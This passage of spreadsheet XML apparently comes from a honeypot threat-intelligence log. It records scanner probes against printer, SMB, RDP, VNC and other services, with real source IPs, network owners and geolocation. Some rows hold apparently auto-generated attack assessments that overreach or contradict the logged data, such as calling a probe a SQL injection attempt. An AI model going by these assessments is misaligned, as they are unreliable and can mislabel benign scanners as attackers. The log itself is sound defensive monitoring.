(compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/version'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '109.123.229.33:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://109.123.229.33:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Host': '5.181.21.224:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.118,54320)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IRC:{'command': 'x10x12 x04MQTTx04  ', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'version_x000d__x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.209.6:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.118;rport=54413'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 154.93.37.45:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '*IDN?_x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '66.94.127.183:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.118,43124)}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.118,56834)}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.118,60910)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '5.180.55.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.180.55.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IRC:{'command': 'x10x12 x04MQTTx04  ', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.90.63.129:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.90.63.129:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 103.211.202.140:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '45.14.244.111:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://45.14.244.111:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a75e:8a76"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Based on the protocol syntax, it appears that an attacker is attempting to exploit multiple services and protocols to gain unauthorized access or gather sensitive information. &amp;&amp; This indicates an attempt to access Oracle database management system, suggesting a potential SQL injection or unauthorized database access attempt. The absence of further information suggests the malicious actor may be probing for vulnerabilities. Further investigation is required to determine the intent behind this action. &amp;&amp; No login attempts detected via SMTP service, indicating potential reconnaissance or probing activity to identify vulnerable services. This could be an initial step by malicious actors before attempting to exploit the system further. No actual malicious activity has occurred yet but there is potential for future exploitation. &amp;&amp; The data indicates that an unknown party attempted to access IMAP services without success, suggesting potential reconnaissance or scanning activity for vulnerabilities. The absence of specific information may indicate the entity was simply probing or trying to find a valid connection. This could be a precursor to more malicious activity."/>
    <s v="The attacker seems to be scanning for vulnerable systems, attempting to crack passwords, and gathering credentials. They are also trying to establish a connection to various services such as FTP, HTTP, HTTPS, POP3, SMTP, and more. &amp;&amp; Brute Force"/>
  </r>
  <r>
    <x v="481"/>
    <x v="481"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T04:01:30"/>
    <d v="2025-04-29T04:01:30"/>
    <d v="2025-04-29T04:01:30"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="Gwanak-gu"/>
    <s v="Jowon-dong"/>
    <s v="6572030"/>
    <s v="151-018"/>
    <s v="37.4828"/>
    <s v="126.908"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="Sudogwonseobubonbu"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d8d:48ac"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET activity detected, but logs indicate potential attempted access to service. This could be indicative of reconnaissance or probing by an attacker. Service is currently unavailable for connection attempts. &amp;&amp; No suspicious TELNET activity detected, as Data_TELNET is marked as Not Available (NA)."/>
    <s v="Port Scan &amp;&amp; Brute Scan"/>
  </r>
  <r>
    <x v="482"/>
    <x v="482"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T03:35:17"/>
    <d v="2025-03-05T00:04:33"/>
    <d v="2025-04-29T03:35:17"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="medium"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SNMP_H28"/>
    <s v="25&amp;&amp;161&amp;&amp;3389&amp;&amp;110&amp;&amp;443&amp;&amp;5900"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BE"/>
    <s v="Berlin"/>
    <s v="NA"/>
    <s v="Berlin (Bezirk Treptow-Köpenick)"/>
    <s v="2950159"/>
    <s v="12489"/>
    <s v="52.4286"/>
    <s v="13.531600000000001"/>
    <s v="208843"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="business"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="2005-09-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;GET&amp;&amp;stshash"/>
    <s v="{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '5.182.38.84', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c2bb:b0b0"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="483"/>
    <x v="483"/>
    <s v="unassigned.172-81-62-246.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T03:29:07"/>
    <d v="2024-03-29T16:06:20"/>
    <d v="2025-04-29T03:29:07"/>
    <n v="735"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;20483&amp;&amp;52860&amp;&amp;56791&amp;&amp;60978&amp;&amp;53415&amp;&amp;59263&amp;&amp;56116&amp;&amp;62009&amp;&amp;55769&amp;&amp;59491&amp;&amp;53301&amp;&amp;63086&amp;&amp;56206&amp;&amp;53066&amp;&amp;52439&amp;&amp;55112&amp;&amp;58316&amp;&amp;57952&amp;&amp;62247&amp;&amp;61035&amp;&amp;64707&amp;&amp;65302"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ef6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="484"/>
    <x v="484"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T03:20:05"/>
    <d v="2025-04-29T03:20:05"/>
    <d v="2025-04-29T03:20:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="ON"/>
    <s v="Ontario"/>
    <s v="Toronto"/>
    <s v="Toronto (Scarborough)"/>
    <s v="6167865"/>
    <s v="M1K"/>
    <s v="43.735"/>
    <s v="-79.2579"/>
    <s v="11878"/>
    <s v="TZULO"/>
    <s v="tzulo"/>
    <s v="hosting"/>
    <s v="Desi Iptv Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:17ea:5a74"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="485"/>
    <x v="485"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T03:15:51"/>
    <d v="2025-04-29T03:15:51"/>
    <d v="2025-04-29T03:15:51"/>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d:97cf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="486"/>
    <x v="486"/>
    <s v="vps-92c07d09.vps.ovh.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T03:10:51"/>
    <d v="2023-12-04T10:10:00"/>
    <d v="2025-04-29T03:10:51"/>
    <n v="220"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;589&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="HDF"/>
    <s v="Hauts-de-France"/>
    <s v="North"/>
    <s v="Roubaix"/>
    <s v="2982681"/>
    <s v="59100"/>
    <s v="50.6917"/>
    <s v="3.2015700000000002"/>
    <s v="16276"/>
    <s v="OVH SAS"/>
    <s v="OVH SAS"/>
    <s v="hosting"/>
    <s v="OVH"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:33ff:3274"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="487"/>
    <x v="487"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T03:10:44"/>
    <d v="2024-12-19T06:11:10"/>
    <d v="2025-04-29T03:10:44"/>
    <n v="80"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H46"/>
    <s v="445&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehrān"/>
    <s v="6659608"/>
    <s v="NA"/>
    <s v="35.7219"/>
    <s v="51.3347"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="TIC"/>
    <s v="business"/>
    <s v="Telecommunication Company of Tehran"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,62268)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,62315)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,58224)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,64527)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,63195)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,62341)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,62285)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,54609)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,55237)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,17502)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,14951)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,14967)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,30231)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,59614)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5110:7cfb"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is insufficient information to analyze any potential malicious activity. No log data was provided for analysis, making it impossible to determine any suspicious behavior."/>
    <m/>
  </r>
  <r>
    <x v="488"/>
    <x v="488"/>
    <s v="unassigned.172-81-62-222.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T02:29:29"/>
    <d v="2023-09-13T22:22:39"/>
    <d v="2025-04-29T02:29:29"/>
    <n v="64957"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;12599&amp;&amp;53619&amp;&amp;63756&amp;&amp;53262&amp;&amp;54105&amp;&amp;49473&amp;&amp;59117&amp;&amp;49731&amp;&amp;60850&amp;&amp;60287&amp;&amp;50723&amp;&amp;52054&amp;&amp;63238&amp;&amp;58660&amp;&amp;51179&amp;&amp;62002&amp;&amp;52677&amp;&amp;51727&amp;&amp;58702&amp;&amp;58471"/>
